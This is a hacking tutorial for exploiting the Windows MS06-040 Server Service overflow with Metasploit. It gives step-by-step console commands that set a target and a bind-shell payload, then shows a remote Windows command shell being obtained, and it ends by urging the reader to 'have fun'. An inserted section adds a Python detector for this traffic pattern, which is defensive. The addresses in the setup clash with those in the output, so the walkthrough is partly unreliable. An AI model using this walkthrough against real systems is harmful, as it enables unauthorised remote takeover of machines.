.:Hacking With Metasploit & Netapi (MS06-040):.

- In this article I show how to exploit a recent flaw in Microsoft Windows.

"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)" and "Microsoft Windows Server Service Remote Buffer Overflow Vulnerability" are different names, but they refer to the same flaw.

Related Links:

http://www.milw0rm.com/exploits/2162

http://www.securityfocus.com/bid/19409

- I keep it very simple.

- First you need these tools to exploit this flaw.

[Metasploit FrameWork]
http://www.metasploit.com/projects/Framework/downloads.html

[Retina scanner; it only scans for this flaw]
http://rapidshare.de/files/32048600/MS06-40.exe.html

- This tool (the Metasploit Framework) runs under Unix/Mac/Windows.

- In this tutorial I was using the Metasploit Framework on Windows.

- For reference (example addresses only): IP of my PC = 192.168.0.1, IP of the remote host = 192.168.0.2

-Begin:

- After finding a host vulnerable to this flaw, we move to the next step:

1. Open the Metasploit Framework Console (msfconsole):

             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


+ -- --=[ msfconsole v2.6 [153 exploits - 76 payloads]

msf > info netapi_ms06_040
/*here we get more information about this exploit*/


      Name: Microsoft CanonicalizePathName() MSO6-040 Overflow
     Class: remote
   Version: $Rev: 3819 $
 Target OS: win32, win2000, winxp, win2003
  Keywords: srvsvc
Privileged: Yes
Disclosure: Aug 08 2006

Provided By:
    H D Moore <hdm [at] metasploit.com>

Available Targets:
    (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)
    (wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4
    (wcscpy) Windows XP SP0/SP1
    (stack)  Windows XP SP1 English

Available Options:

    Exploit:    Name       Default    Description
    --------    -------    -------    ---------------------------------------

    required    RHOST                 The target address
    optional    SMBDOM                The domain for specified SMB username
    optional    SMBUSER               The SMB username to connect with
    optional    SMBPASS               The password for specified SMB username

Payload Information:
    Space: 370
    Avoid: 7 characters
   | Keys: noconn tunnel bind ws2ord reverse

Nop Information:
 SaveRegs: esp ebp
   | Keys:

Encoder Information:
   | Keys:

Description:
    This module exploits a stack overflow in the NetApi32
    CanonicalizePathName() function using the NetpwPathCanonicalize
    RPC call in the Server Service. It is likely that other RPC calls
    could be used to exploit this service. This exploit will result in
    a denial of service on on Windows XP SP2 or Windows 2003 SP1. A
    failed exploit attempt will likely result in a complete reboot on
    Windows 2000 and the termination of all SMB-related services on
    Windows XP. The default target for this exploit should succeed on
    Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.

References:
    http://www.securityfocus.com/bid/19409
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-3439
    http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx


msf > use netapi_ms06_040
/*Selecting the exploit*/

msf netapi_ms06_040 > set PAYLOAD win32_bind
/*Selecting the PAYLOAD*/

PAYLOAD -> win32_bind
msf netapi_ms06_040(win32_bind) > show options
/*getting information*/

Exploit and Payload Options
===========================

  Exploit:    Name       Default    Description
  --------    -------    -------    ---------------------------------------
  required    RHOST                 The target address
  optional    SMBDOM                The domain for specified SMB username
  optional    SMBUSER               The SMB username to connect with
  optional    SMBPASS               The password for specified SMB username

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------

  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

msf netapi_ms06_040(win32_bind) > set LPORT 4444
LPORT -> 4444
/*setting the variable*/

msf netapi_ms06_040(win32_bind) > set RHOST 192.168.0.2
RHOST -> 192.168.0.2
/*same here: setting the variable*/

msf netapi_ms06_040(win32_bind) > set EXITFUNC thread
EXITFUNC -> thread
/*same here: setting the variable*/


msf netapi_ms06_040(win32_bind) > set
EXITFUNC: thread
LPORT: 4444
PAYLOAD: win32_bind
RHOST: 192.168.0.2
/*here it shows the variables we have set*/


- If everything is OK, all that is left is to run the exploit.

msf netapi_ms06_040(win32_bind) >exploit
[*]Starting Bind Handler
[*]Detected a Windows 2000 target
[*]Sending request....
[*]Got connection from 192.168.190.1:1902 <-> 192.168.190.129:4444

Microsoft Windows 2000 [Verson 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>_

- Everything went OK; now I am in the console of the remote host.
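Seen from the defending side, the session output above gives a usable detection pattern: a connection to the Server Service over SMB (TCP 445 or 139), followed shortly by a second connection from the same source to a high, otherwise unused port on the same host (the bind-shell listener, LPORT 4444 here). The following Python script is an added example and not part of the original article; it correlates constructed flow-log lines in a hypothetical format of my own ("<epoch> <src>:<sport> -> <dst>:<dport> <proto>"), and the window size and known-service port list are assumptions to tune per environment.

```python
"""Flag SMB connection followed by a connection to a high port on the same host.

Added example, not from the original article. The log format and the sample
lines below are constructed; the 60 s window and the known-service list are
tuning assumptions.
"""
import re
from collections import defaultdict
from typing import List, NamedTuple, Optional

# Hypothetical flow-log line: "<epoch> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto>"
LOG_RE = re.compile(
    r"^(?P<ts>\d+)\s+(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)\s+(?P<proto>\w+)$"
)
SMB_PORTS = {139, 445}                       # Server Service / NetBIOS session
KNOWN_SERVICE_PORTS = frozenset({80, 443, 25, 53, 135, 139, 445, 3389})
WINDOW_SECONDS = 60                          # assumed correlation window


class Conn(NamedTuple):
    ts: int
    src: str
    dst: str
    dport: int


class Alert(NamedTuple):
    src: str
    dst: str
    smb_ts: int        # timestamp of the SMB connection that preceded the follow-up
    shell_port: int    # the suspicious high port (4444 in the tutorial)
    shell_ts: int


def parse_line(line: str) -> Optional[Conn]:
    """Parse one log line; malformed lines are skipped rather than fatal."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return Conn(int(m["ts"]), m["src"], m["dst"], int(m["dport"]))


def find_bind_shell_followups(lines, window: int = WINDOW_SECONDS,
                              known_ports=KNOWN_SERVICE_PORTS) -> List[Alert]:
    """Return an Alert for every connection to an unusual high port that was
    preceded, within `window` seconds, by an SMB connection from the same
    source to the same destination."""
    conns = sorted((c for c in map(parse_line, lines) if c is not None),
                   key=lambda c: c.ts)
    smb_seen = defaultdict(list)   # (src, dst) -> timestamps of SMB connections
    alerts: List[Alert] = []
    for c in conns:
        key = (c.src, c.dst)
        if c.dport in SMB_PORTS:
            smb_seen[key].append(c.ts)
            continue
        # Privileged ports and known services are ordinary traffic; skip them.
        if c.dport <= 1023 or c.dport in known_ports:
            continue
        recent = [t for t in smb_seen[key] if 0 <= c.ts - t <= window]
        if recent:
            alerts.append(Alert(c.src, c.dst, max(recent), c.dport, c.ts))
    return alerts


# Constructed sample log: the first two lines mirror the tutorial's session
# (SMB exploit delivery, then the connection to the bind-shell port 4444).
SAMPLE_LOG = """\
1155100000 192.168.190.1:1891 -> 192.168.190.129:445 tcp
1155100003 192.168.190.1:1902 -> 192.168.190.129:4444 tcp
1155100010 192.168.190.5:2200 -> 192.168.190.129:445 tcp
1155100020 192.168.190.5:2210 -> 192.168.190.129:80 tcp
1155100500 192.168.190.1:1950 -> 192.168.190.129:4444 tcp
this line is not a flow record
"""

if __name__ == "__main__":
    for a in find_bind_shell_followups(SAMPLE_LOG.splitlines()):
        print(f"possible bind shell: {a.src} -> {a.dst}:{a.shell_port} "
              f"at {a.shell_ts}, SMB contact at {a.smb_ts}")
```

Only the first pair of lines produces an alert: the second source talks to SMB and then to port 80 (a known service), and the last 4444 connection is far outside the window. Because the module's payload list also includes reverse connections, the mirror rule (an SMB connection followed by a new outbound connection from the server back to the same source) is needed to cover that variant; the same correlation by (src, dst) pair applies with the directions swapped.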

- Now just have fun; use your imagination.

- Written by: Linux Benutzer
